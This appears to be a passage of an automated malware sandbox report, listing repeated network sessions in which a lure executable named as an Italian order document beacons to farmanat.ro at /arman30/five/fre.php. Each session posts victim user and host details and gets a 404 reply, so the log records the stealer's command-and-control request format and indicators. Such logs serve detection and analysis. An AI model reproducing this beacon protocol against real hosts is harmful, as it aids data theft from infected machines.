                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              177192.168.11.2050018176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:41.083152056 CET6563OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:41.117058992 CET6563OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:41.170712948 CET6563INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              178192.168.11.2050019176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:41.586026907 CET6564OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:41.619617939 CET6564OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:41.671798944 CET6565INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              179192.168.11.2050020176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:42.108783960 CET6565OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:42.143014908 CET6565OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:42.223660946 CET6566INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              18192.168.11.2049853176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:12.876249075 CET6330OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:12.909812927 CET6330OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:12.958539963 CET6331INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              180192.168.11.2050021176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:42.628957987 CET6567OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:42.662528038 CET6567OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:42.714049101 CET6567INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              181192.168.11.2050022176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:43.093220949 CET6568OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:43.127218008 CET6568OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:43.177671909 CET6569INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              182192.168.11.2050023176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:43.580123901 CET6569OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:43.613445997 CET6569OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:43.662293911 CET6570INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              183192.168.11.2050024176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:44.062925100 CET6571OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:44.097121954 CET6571OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:44.146981955 CET6571INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              184192.168.11.2050025176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:44.593789101 CET6572OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:44.627295971 CET6572OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:44.682646036 CET6572INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              185192.168.11.2050026176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:45.081557035 CET6573OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:45.114862919 CET6573OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:45.164135933 CET6574INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              186192.168.11.2050027176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:45.567534924 CET6575OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:45.601788998 CET6575OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:45.651731968 CET6575INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              187192.168.11.2050029176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:46.099241018 CET6582OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:46.133419991 CET6583OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:46.189888954 CET6583INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              188192.168.11.2050030176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:46.560009003 CET6584OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:46.594052076 CET6584OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:46.644582987 CET6584INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              189192.168.11.2050031176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:47.093239069 CET6585OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:47.126807928 CET6585OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:47.183104992 CET6586INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              19192.168.11.2049854176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:13.646368980 CET6331OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:13.680684090 CET6332OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:13.730961084 CET6332INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              190192.168.11.2050032176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:47.621285915 CET6586OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:47.655595064 CET6587OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:47.706348896 CET6587INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              191192.168.11.2050033176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:48.138015032 CET6588OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:48.171521902 CET6588OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:48.220877886 CET6588INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              192192.168.11.2050034176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:48.608439922 CET6589OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:48.642729998 CET6589OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:48.695771933 CET6590INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              193192.168.11.2050035176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:49.101921082 CET6590OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:49.135534048 CET6590OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:49.190454960 CET6591INHTTP/1.1 404 Not Found
                                              Server: nginx
